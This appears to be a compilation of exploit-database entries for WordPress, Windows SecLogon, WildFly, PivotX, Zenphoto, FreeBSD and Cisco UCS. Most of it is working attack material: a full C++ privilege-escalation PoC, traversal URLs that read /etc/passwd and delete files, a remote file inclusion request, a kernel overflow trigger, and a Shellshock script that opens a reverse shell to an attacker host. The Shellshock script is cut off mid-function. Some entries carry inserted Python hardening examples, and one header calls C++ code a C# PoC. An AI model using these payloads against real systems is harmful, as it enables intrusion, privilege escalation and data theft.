
# Exploit Title: Wordpress Import CSV | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
# Stable Tag: 1.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
======================================
 
[PoC]
======================================
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
Click on the link "From an url".
In the "URL" field, enter "../../../wp-config.php".
Submit the form and inspect the response body.
======================================
            
/*
Sources: 
https://bugs.chromium.org/p/project-zero/issues/detail?id=687
https://googleprojectzero.blogspot.ca/2016/03/exploiting-leaked-thread-handle.html

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not tested on Windows 7
Class: Elevation of Privilege

Summary:
The SecLogon service does not sanitize standard handles when creating a new process, which leads to a system service thread pool handle being duplicated into a user-accessible process. This can be used to elevate privileges to Local System.

Description:

The APIs CreateProcessWithToken and CreateProcessWithLogon are exposed to user applications; however, they are actually implemented in a system service, Secondary Logon. When these methods are called the request is dispatched over RPC to the service.

Both of these methods take the normal STARTUPINFO structure and support the passing of standard handles when STARTF_USESTDHANDLES is used. Rather than the "standard" way of inheriting these handles into the new process, the service copies them manually using the SlpSetStdHandles function. This does something equivalent to:

BOOL SlpSetStdHandles(HANDLE hSrcProcess, HANDLE hTargetProcess, HANDLE handles[]) {
   foreach(HANDLE h : handles) {
     HANDLE hNewHandle;
     // The source handle value is passed straight through: nothing rejects
     // pseudo-handle values such as -1 (current process) or -2 (current thread).
     DuplicateHandle(hSrcProcess, h, hTargetProcess, &hNewHandle, 0, FALSE, DUPLICATE_SAME_ACCESS);
   }
}

The vulnerability is that nothing sanitizes these values. NtDuplicateObject special-cases a couple of values for the source handle: Current Process (-1) and Current Thread (-2). NtDuplicateObject switches the thread's current process to the target process when duplicating the handle; this means that, while duplicating -1 will return a handle to the new process, -2 will return a handle to the current thread, which is actually a thread inside the svchost process hosting seclogon. When DUPLICATE_SAME_ACCESS is passed for the current-thread handle it is automatically given THREAD_ALL_ACCESS rights. The handle now exists in the new process and can be used by low-privileged code.

This can be exploited in a number of ways. The new process can set the thread’s context causing the thread to dispatch to an arbitrary RIP. Or as these are thread pool threads servicing RPC requests for services such as BITS, Task Scheduler or seclogon itself you could do things like force a system level impersonation token (repeatedly) which overrides the security enforcement of these services leading to arbitrary file writes or process creation at Local System. It would be easy enough to run the exploit multiple times to capture handles to all thread pool threads available for RPC in the hosting process and then just keep trying until it succeeds.

One final point on exploitability. A normal user cannot use CreateProcessWithToken, as the service checks that an arbitrary process can be opened by the user and has SeImpersonatePrivilege in its primary token. CreateProcessWithLogon will work, but it seems you'd need to know a user's password, which makes it less useful for a malicious attacker. However, you can specify the LOGON_NETCREDENTIALS_ONLY flag, which changes the behaviour of LogonUser: instead of needing valid credentials, the password is used to change the network password of a copy of the caller's token. The password can be anything you like; it doesn't matter.

Proof of Concept:

I’ve provided a PoC as a C# source code file. You need to compile it with Any CPU support (do not set 32 bit preferred). The PoC must match the OS bitness. 

1) Compile the C# source code file.
2) Execute the poc executable as a normal user. This will not work from low IL.
3) The PoC should display a message box on error or success.

Expected Result:
The call to CreateProcessWithLogon should fail and the PoC will display the error.

Observed Result:
The process shows that it’s captured a handle from a service process. If you check process explorer or similar you’ll see the thread handle has full access rights.
*/

#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <map>

#define MAX_PROCESSES 1000

HANDLE GetThreadHandle()
{
  PROCESS_INFORMATION procInfo = {};
  STARTUPINFO startInfo = {};
  startInfo.cb = sizeof(startInfo);

  startInfo.hStdInput = GetCurrentThread();
  startInfo.hStdOutput = GetCurrentThread();
  startInfo.hStdError = GetCurrentThread();
  startInfo.dwFlags = STARTF_USESTDHANDLES;

  if (CreateProcessWithLogonW(L"test", L"test", L"test", 
               LOGON_NETCREDENTIALS_ONLY, 
               nullptr, L"cmd.exe", CREATE_SUSPENDED, 
               nullptr, nullptr, &startInfo, &procInfo))
  {
    HANDLE hThread;   
    BOOL res = DuplicateHandle(procInfo.hProcess, (HANDLE)0x4, 
             GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
    DWORD dwLastError = GetLastError();
    TerminateProcess(procInfo.hProcess, 1);
    CloseHandle(procInfo.hProcess);
    CloseHandle(procInfo.hThread);
    if (!res)
    {
      printf("Error duplicating handle %d\n", dwLastError);
      exit(1);
    }

    return hThread;
  }
  else
  {
    printf("Error: %d\n", GetLastError());
    exit(1);
  }
}

typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle, 
      HANDLE ThreadToImpersonate, 
      PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);

HANDLE GetSystemToken(HANDLE hThread)
{
  SuspendThread(hThread);

  NtImpersonateThread* fNtImpersonateThread = 
     (NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"), 
                                          "NtImpersonateThread");
  SECURITY_QUALITY_OF_SERVICE sqos = {};
  sqos.Length = sizeof(sqos);
  sqos.ImpersonationLevel = SecurityImpersonation;
  SetThreadToken(&hThread, nullptr);
  NTSTATUS status = fNtImpersonateThread(hThread, hThread, &sqos);
  if (status != 0)
  {
    ResumeThread(hThread);
    printf("Error impersonating thread %08X\n", status);
    exit(1);
  }

  HANDLE hToken;
  if (!OpenThreadToken(hThread, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, 
                       FALSE, &hToken))
  {
    printf("Error opening thread token: %d\n", GetLastError());
    ResumeThread(hThread);    
    exit(1);
  }

  ResumeThread(hThread);

  return hToken;
}

struct ThreadArg
{
  HANDLE hThread;
  HANDLE hToken;
};

DWORD CALLBACK SetTokenThread(LPVOID lpArg)
{
  ThreadArg* arg = (ThreadArg*)lpArg;
  while (true)
  {
    if (!SetThreadToken(&arg->hThread, arg->hToken))
    {
      printf("Error setting token: %d\n", GetLastError());
      break;
    }
  }
  return 0;
}

int main()
{
  std::map<DWORD, HANDLE> thread_handles;
  printf("Gathering thread handles\n");

  for (int i = 0; i < MAX_PROCESSES; ++i) {
    HANDLE hThread = GetThreadHandle();
    DWORD dwTid = GetThreadId(hThread);
    if (!dwTid)
    {
      printf("Handle not a thread: %d\n", GetLastError());
      exit(1);
    }

    if (thread_handles.find(dwTid) == thread_handles.end())
    {
      thread_handles[dwTid] = hThread;
    }
    else
    {
      CloseHandle(hThread);
    }
  }

  printf("Done, got %zd handles\n", thread_handles.size());
  
  if (thread_handles.size() > 0)
  {
    HANDLE hToken = GetSystemToken(thread_handles.begin()->second);
    printf("System Token: %p\n", hToken);
    
    for (const auto& pair : thread_handles)
    {
      ThreadArg* arg = new ThreadArg;

      arg->hThread = pair.second;
      DuplicateToken(hToken, SecurityImpersonation, &arg->hToken);

      CreateThread(nullptr, 0, SetTokenThread, arg, 0, nullptr);
    }

    while (true)
    {
      PROCESS_INFORMATION procInfo = {};
      STARTUPINFO startInfo = {};
      startInfo.cb = sizeof(startInfo);     

      if (CreateProcessWithLogonW(L"test", L"test", L"test", 
              LOGON_NETCREDENTIALS_ONLY, nullptr, 
              L"cmd.exe", CREATE_SUSPENDED, nullptr, nullptr, 
              &startInfo, &procInfo))
      {
        HANDLE hProcessToken;
        // If we can't get process token good chance it's a system process.
        if (!OpenProcessToken(procInfo.hProcess, MAXIMUM_ALLOWED, 
                              &hProcessToken))
        {
          printf("Couldn't open process token %d\n", GetLastError());
          ResumeThread(procInfo.hThread);
          break;
        }
        // Just to be sure let's check the process token isn't elevated.
        TOKEN_ELEVATION elevation;
        DWORD dwSize = 0;
        if (!GetTokenInformation(hProcessToken, TokenElevation, 
                              &elevation, sizeof(elevation), &dwSize))
        {
          printf("Couldn't get token elevation: %d\n", GetLastError());
          ResumeThread(procInfo.hThread);
          break;
        }

        if (elevation.TokenIsElevated)
        {
          printf("Created elevated process\n");
          break;
        }

        TerminateProcess(procInfo.hProcess, 1);
        CloseHandle(procInfo.hProcess);
        CloseHandle(procInfo.hThread);
      }     
    }
  }

  return 0;
}
            
Exploit Title: Wildfly: WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass
Date: 09.02.16
Exploit Author: Tal Solomon of Palantir Security
Vendor Homepage: https://bugzilla.redhat.com/show_bug.cgi?id=1305937
Software Link: http://wildfly.org/downloads/
Version: This issue affects versions of Wildfly prior to 10.0.0.Final, including 9.0.2.Final and 8.2.1.Final.
Tested on: Windows
CVE : CVE-2016-0793

An information disclosure of the content of the restricted WEB-INF and META-INF directories via the servlet filter mechanism was reported. The servlet filter restriction is enforced by two code checks:

if (path.startsWith("/META-INF") || path.startsWith("META-INF") || path.startsWith("/WEB-INF") || path.startsWith("WEB-INF")) {
    return false;
}

private boolean isForbiddenPath(String path) {
    return path.equalsIgnoreCase("/meta-inf/") || path.regionMatches(true, 0, "/web-inf/", 0, "/web-inf/".length());
}

Both can be bypassed by using lower case and by adding meaningless characters to the path.
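To make the gap concrete, the following Python is an added example (not part of the advisory and not WildFly code) that re-implements the two checks above, shows that a lower-case path slips past them, and places next to them a check that decodes and normalizes the request path before comparing each segment case-insensitively.

```python
import posixpath
from urllib.parse import unquote


def wildfly_filter_allows(path):
    """Python mirror of the two WildFly checks quoted in the advisory.
    Returns True when the request would be let through."""
    # Check 1: case-sensitive prefix test.
    if (path.startswith("/META-INF") or path.startswith("META-INF")
            or path.startswith("/WEB-INF") or path.startswith("WEB-INF")):
        return False
    # Check 2: isForbiddenPath(): exact match for "/meta-inf/" (ignoring case),
    # 9-character case-insensitive prefix match for "/web-inf/".
    if path.lower() == "/meta-inf/" or path[:9].lower() == "/web-inf/":
        return False
    return True


FORBIDDEN_DIRS = {"web-inf", "meta-inf"}


def hardened_filter_allows(raw_path):
    """Deny the request when any normalized path segment names WEB-INF or
    META-INF. Decoding and normalization happen before the comparison, so
    letter case, dot segments and doubled slashes no longer change the result."""
    path = unquote(raw_path)
    if "\x00" in path or not path.isascii():
        return False  # reject NUL bytes and non-ASCII look-alikes outright
    path = path.replace("\\", "/").lstrip("/")
    # normpath collapses "//", "/./" and "/../"; the leading "/" pins the
    # result to the application root so ".." cannot climb above it.
    normalized = posixpath.normpath("/" + path)
    segments = [segment.lower() for segment in normalized.split("/") if segment]
    return not any(segment in FORBIDDEN_DIRS for segment in segments)
```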

Proof of Concept Video:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39573.zip
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    PivotX 2.3.11
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pivotx.net/
Vulnerability Type:  Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  01/20/2016
Disclosed to public: 03/15/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to Directory Traversal, allowing authenticated users to read and
delete files outside of the PivotX directory.

3. Details

Description

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

The function cleanPath which is responsible for sanitizing path names can be
bypassed by an attacker, leading to directory traversal in multiple places.

Proof of Concept

Admins and Superadmins can read any file:

http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//...//.....//...//.....//...//.....//...//.....//...//etc/passwd

Advanced users, Admins and Superadmins can delete any file, possibly leading to
DOS:

http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//...//.....//...//.....//...//.....//...//.....//...//.....//...//important/important.file&pivotxsession=ovyyn4ob2jc5ym92

Code

lib.php
function cleanPath($path) {
    $path = str_replace('../', '', $path);
    $path = str_replace('..\\', '', $path);
    $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
    return $path;
}
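The reason the `.....//...//` pattern works is that each str_replace call is a single pass and, on a POSIX host, the `'../'` needle is applied twice. The Python below is an added example (mine, not PivotX code) that mirrors cleanPath() to show this, next to a containment check that resolves the path against the base directory instead of stripping substrings; `DEMO_BASEDIR` is the value decoded from the PoC's basedir parameter.

```python
import os

# Decoded from the base64 basedir parameter in the PoC URL above.
DEMO_BASEDIR = "/var/www/pivotx_latest/Basedir"


def pivotx_clean_path(path, directory_separator="/"):
    """Python mirror of PivotX 2.3.11 cleanPath(). Each str.replace() is a
    single left-to-right pass, exactly like PHP's str_replace(); with
    DIRECTORY_SEPARATOR == "/" the "../" needle therefore runs twice, and
    ".....//...//" survives the first pass as "..././" and the second as "../"."""
    path = path.replace("../", "")
    path = path.replace("..\\", "")
    path = path.replace(".." + directory_separator, "")
    return path


def safe_join(basedir, user_path):
    """Resolve user_path inside basedir and refuse anything that escapes it.
    Nothing is stripped or rewritten: the path is canonicalized (symlinks
    included) and then compared against the canonical base directory.
    Returns the resolved absolute path, or None when it lies outside basedir."""
    try:
        base = os.path.realpath(basedir)
        # os.path.join discards base when user_path is absolute; realpath then
        # yields e.g. "/etc/passwd", which fails the containment test below.
        candidate = os.path.realpath(os.path.join(base, user_path))
    except ValueError:  # embedded NUL byte
        return None
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```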

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Zenphoto 1.4.11
Fixed in:            1.4.12
Fixed Version Link:  https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Vendor Website:      http://www.zenphoto.org/
Vulnerability Type:  RFI
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 03/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.

3. Details

Description

CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C

When downloading a log file, the input is not properly sanitized, leading to
RFI.

An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.

In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.

Proof of Concept

GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1

Code

// admin-logs.php (sanitize(x, 3) only strips out tags)
case 'download_log':
    $zipname = sanitize($_GET['tab'], 3) . '.zip';
    if (class_exists('ZipArchive')) {
        $zip = new ZipArchive;
        $zip->open($zipname, ZipArchive::CREATE);
        $zip->addFile($file, basename($file));
        $zip->close();
        ob_get_clean();
        header("Pragma: public");
        header("Expires: 0");
        header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
        header("Cache-Control: private", false);
        header("Content-Type: application/zip");
        header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
        header("Content-Transfer-Encoding: binary");
        header("Content-Length: " . filesize($zipname));
        readfile($zipname);
        // remove zip file from temp path
        unlink($zipname);
        exit;
    } else {
        include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
        $zip = new ZipStream($zipname);
        $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
        $zip->finish();
    }
    break;

4. Solution

To mitigate this issue please upgrade at least to version 1.4.12:

https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
            
/*

1. Advisory Information

Title: FreeBSD Kernel amd64_set_ldt Heap Overflow
Advisory ID: CORE-2016-0005
Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64_set_ldt-heap-overflow
Date published: 2016-03-16
Date of last update: 2016-03-14
Vendors contacted: FreeBSD
Release mode: Coordinated release

2. Vulnerability Information

Class: Unsigned to Signed Conversion Error [CWE-196]
Impact: Denial of service
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2016-1885

 

3. Vulnerability Description

FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices.

An integer signedness error has been found in the amd64_set_ldt() function in the FreeBSD kernel code (defined in the /sys/amd64/amd64/sys_machdep.c file), which implements the i386_set_ldt system call on the amd64 version of the OS. This integer signedness issue ultimately leads to a heap overflow in the kernel, allowing local unprivileged attackers to crash the system.

4. Vulnerable packages

FreeBSD 10.2 amd64.
Other amd64 versions may be affected too, but they were not checked.

5. Non-vulnerable packages

FreeBSD 10.2-RELENG.

6. Vendor Information, Solutions and Workarounds

The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.2-RELENG.

7. Credits

This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

 

8. Technical Description / Proof of Concept Code

8.1. FreeBSD amd64_set_ldt Integer Signedness Vulnerability

[CVE-2016-1885] FreeBSD exposes the i386_set_ldt[1] architecture-dependent system call for its Intel i386 version. This system call can be used to manage i386 per-process Local Descriptor Table (LDT) entries. The amd64 version of FreeBSD still exposes this system call for 32-bit applications running on the 64-bit version of the OS.

Architecture-specific system calls are handled by the FreeBSD kernel in the sysarch() function, which is defined in the /sys/amd64/amd64/sys_machdep.c[2] file:

int
sysarch(td, uap)
    struct thread *td;
    register struct sysarch_args *uap;
{
[...]
if (uap->op == I386_GET_LDT || uap->op == I386_SET_LDT)
    return (sysarch_ldt(td, uap, UIO_USERSPACE));
[...]
     
As we can see in the code snippet above, if the system call being invoked is either I386_GET_LDT or I386_SET_LDT, then the sysarch_ldt() function is called. The following code excerpt shows the part of the sysarch_ldt() function that is in charge of handling the I386_SET_LDT syscall:

int
sysarch_ldt(struct thread *td, struct sysarch_args *uap, int uap_space)
{
struct i386_ldt_args *largs, la;
struct user_segment_descriptor *lp;
[...]
switch (uap->op) {
    [...]
    case I386_SET_LDT:
            if (largs->descs != NULL && largs->num > max_ldt_segment)
                return (EINVAL);
            set_pcb_flags(td->td_pcb, PCB_FULL_IRET);
            if (largs->descs != NULL) {
                lp = malloc(largs->num * sizeof(struct
                    user_segment_descriptor), M_TEMP, M_WAITOK);
                error = copyin(largs->descs, lp, largs->num *
                    sizeof(struct user_segment_descriptor));
                if (error == 0)
                    error = amd64_set_ldt(td, largs, lp);
                free(lp, M_TEMP);
            } else {
                error = amd64_set_ldt(td, largs, NULL);
            }
            break;
     
The largs variable that can be seen there is a pointer to an i386_ldt_args structure, which is defined as follows in the /sys/x86/include/sysarch.h[3] file:

struct i386_ldt_args {
    unsigned int start;
    union descriptor *descs;
    unsigned int num;
};
     
Note that all of the fields of the i386_ldt_args structure are fully user-controlled: they match the 3 arguments specified by the user when i386_set_ldt() was called from user mode:

int i386_set_ldt(int start_sel, union descriptor *descs, int num_sels);
     
From the sysarch_ldt() snippet above we can see that if we call i386_set_ldt() from user mode specifying a NULL pointer as the second argument (largs->descs), then it will end up calling the amd64_set_ldt() function, passing the largs variable as the second argument, and a NULL pointer as the third argument. This is the prototype of the amd64_set_ldt() function being called:

int
amd64_set_ldt(struct thread *td, struct i386_ldt_args *uap, struct user_segment_descriptor *descs);
     
amd64_set_ldt() is the vulnerable function here. Since it is being called with its third argument (the descs pointer) set to NULL, the following code path will be executed (remember that every field in the i386_ldt_args structure pointed to by the uap pointer is fully controlled from user mode):

    int
    amd64_set_ldt(td, uap, descs)
        struct thread *td;
        struct i386_ldt_args *uap;
        struct user_segment_descriptor *descs;
    {
    [...]
        int largest_ld;
    [...]
608        if (descs == NULL) {
609                 Free descriptors 
610                if (uap->start == 0 && uap->num == 0)
611                        uap->num = max_ldt_segment;
612                if (uap->num == 0)
613                        return (EINVAL);
614                if ((pldt = mdp->md_ldt) == NULL ||
615                    uap->start >= max_ldt_segment)
616                        return (0);
617                largest_ld = uap->start + uap->num;
618                if (largest_ld > max_ldt_segment)
619                        largest_ld = max_ldt_segment;
620                i = largest_ld - uap->start;
621                mtx_lock(&dt_lock);
622                bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623                    [uap->start], sizeof(struct user_segment_descriptor) * i);
624                mtx_unlock(&dt_lock);
625                return (0);
626        }
     
The two if statements at lines 610 and 612 perform some sanity checks on uap->start and uap->num, which can be avoided by setting uap->num to a value other than 0. The next check at lines 614/615 causes the function to exit early if the mdp->md_ldt pointer is NULL, or if uap->start is greater than or equal to max_ldt_segment (1024). Having mdp->md_ldt hold a non-NULL value can be achieved by adding an initial entry to the process LDT before triggering the bug, like this:

    struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; 
    i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
     
After passing those checks we reach the vulnerable code at lines 617-619:

617                largest_ld = uap->start + uap->num;
618                if (largest_ld > max_ldt_segment)
619                        largest_ld = max_ldt_segment;
620                i = largest_ld - uap->start;
     
Note that largest_ld is a signed int that will hold the sum uap->start + uap->num. The code at lines 618-619 tries to ensure that largest_ld is not greater than max_ldt_segment (1024); however, since largest_ld is a signed integer holding a value fully controlled from user mode, the comparison is a signed one and can be bypassed by setting uap->num to a value that is negative when interpreted as an int.

This signedness error will ultimately lead to a heap overflow in the FreeBSD kernel when the bzero() function is later called with a huge value as its len parameter:

622                bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623                    [uap->start], sizeof(struct user_segment_descriptor) * i);
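
As an added illustration (not part of the advisory or of the FreeBSD source), the following Python models the integer conversions C performs on the descs == NULL path above, to show how a negative uap->num turns the bzero() length into a huge size_t, next to a check that refuses oversized counts before any arithmetic happens. The type of `i` and the non-NULL md_ldt are assumptions stated in the code.

```python
MAX_LDT_SEGMENT = 1024   # max_ldt_segment on FreeBSD 10.2 amd64, per the advisory
SIZEOF_DESCRIPTOR = 8    # sizeof(struct user_segment_descriptor)
EINVAL = 22              # errno value returned by the kernel checks
MASK32 = (1 << 32) - 1
MASK64 = (1 << 64) - 1


def as_uint32(value):
    """C 'unsigned int' semantics: wrap modulo 2**32."""
    return value & MASK32


def as_int32(value):
    """C 'int' semantics: 32-bit two's complement."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value


def vulnerable_free_descriptors(start, num):
    """Model of the descs == NULL path of amd64_set_ldt() (lines 610-623 above).
    uap->start and uap->num are unsigned int; largest_ld is int, and i is
    assumed to be int as well (its declaration is elided in the excerpt).
    md_ldt is assumed non-NULL, i.e. the process already has an LDT.
    Returns the (offset, length) pair bzero() would receive, None for the
    early return at line 616, or EINVAL."""
    start, num = as_uint32(start), as_uint32(num)
    if start == 0 and num == 0:
        num = MAX_LDT_SEGMENT
    if num == 0:
        return EINVAL
    if start >= MAX_LDT_SEGMENT:
        return None
    largest_ld = as_int32(start + num)        # unsigned add, then stored in an int
    if largest_ld > MAX_LDT_SEGMENT:          # signed compare: a negative value passes
        largest_ld = MAX_LDT_SEGMENT
    i = as_int32(largest_ld - start)          # negative when num had its top bit set
    # sizeof(...) is size_t, so i is converted to size_t: a negative i becomes huge
    length = (SIZEOF_DESCRIPTOR * (i & MASK64)) & MASK64
    return start * SIZEOF_DESCRIPTOR, length


def hardened_free_descriptors(start, num):
    """Same operation with the count bounded before any signed arithmetic.
    An illustrative fix written for this example, not the vendor's patch."""
    start, num = as_uint32(start), as_uint32(num)
    if start == 0 and num == 0:
        num = MAX_LDT_SEGMENT
    if num == 0 or num > MAX_LDT_SEGMENT:
        return EINVAL
    if start >= MAX_LDT_SEGMENT:
        return None
    largest_ld = min(start + num, MAX_LDT_SEGMENT)   # both operands <= 1024: no wrap
    return start * SIZEOF_DESCRIPTOR, SIZEOF_DESCRIPTOR * (largest_ld - start)


if __name__ == "__main__":
    # The arguments the PoC below passes: i386_set_ldt(1, NULL, 0x80000000)
    print("vulnerable:", vulnerable_free_descriptors(1, 0x80000000))
    print("hardened:  ", hardened_free_descriptors(1, 0x80000000))
```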
     
8.2. Proof of Concept

The following Proof-of-Concept code reproduces the vulnerability in a default FreeBSD 10.2-RELEASE-amd64 installation running a GENERIC kernel:

*/

/* $ clang amd64_set_ldt.c -o amd64_set_ldt -m32 */

#include <stdio.h>
#include <unistd.h>
#include <machine/segments.h>
#include <machine/sysarch.h>
#include <sysexits.h>
#include <err.h>


int main(int argc, char **argv){

    int res;

    struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; 

    printf("[+] Adding an initial entry to the process LDT...\n");
    res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
    if (res < 0){
        err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)");
    }
    printf("returned index: %d\n", res);

    printf("Triggering the bug...\n");
    res = i386_set_ldt(1, NULL, 0x80000000);
}
     
/*

9. Report Timeline

2016-03-02: Core Security sent an initial notification to FreeBSD.
2016-03-02: FreeBSD confirmed reception of our email and requested we sent them a draft version of the advisory.
2016-03-02: Core Security sent FreeBSD a draft version of the advisory. We requested them to let us know once they finished reviewing the advisory in order to coordinate a publication date.
2016-03-11: Core Security asked FreeBSD if they were able to review and verify the reported issue. We additionally requested an estimated date for releasing the fix/update.
2016-03-11: FreeBSD informed us they were going to release the update in the middle of the following week.
2016-03-11: Core Security asked FreeBSD if they had the specific date and time they were going to release the update. We additionally requested a CVE identifier for the vulnerability considering they are registered as a CNA.
2016-03-11: FreeBSD informed us they would probably release it on Wednesday 16th of March and that they assigned the CVE-2016-1885 ID.
2016-03-16: Advisory CORE-2016-0005 published.

10. References

[1] https://www.freebsd.org/cgi/man.cgi?query=i386_set_ldt&sektion=2&manpath=FreeBSD+8.2-RELEASE
[2] https://svnweb.freebsd.org/base/release/10.2.0/sys/amd64/amd64/sys_machdep.c?view=markup
[3] https://svnweb.freebsd.org/base/release/10.2.0/sys/x86/include/sysarch.h?view=markup

11. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

12. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

13. Disclaimer

The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

*/
            
#!/usr/bin/python
###############################################
# Cisco UCS Manager 2.1(1b) Shellshock Exploit
# 
# CVE-2014-6278
# Confirmed on version 2.1(1b), but more are likely vulnerable.
# Cisco's advisory: 
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
# Exploit generates a reverse shell to a nc listener.
# Exploit Author: @thatchriseckert
###############################################

import sys
import requests
import time
 
if len(sys.argv) < 4:
	print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
	print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>" 
	print "[*]"
	print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
	print "[*] Listener: nc -lvp <port>"
	print "\n"
	sys.exit()

#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings() 
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
		'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
		}
headers2 = {
		"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
		}

def exploit():
	try:
		r = requests.get(url, headers=headers1, verify=False, timeout=5)
	except Exception, e:
		if 'timeout' in str(e):
			print "[+] Success.  Enjoy your shell..."
		else:
			print "[-] Something is wrong..."
			print "[-] Error: " + str(e)

def main():
	try:
		r = requests.get(url, headers=headers2, verify=False, timeout=3)
		if r.content.startswith('\nroot:'):
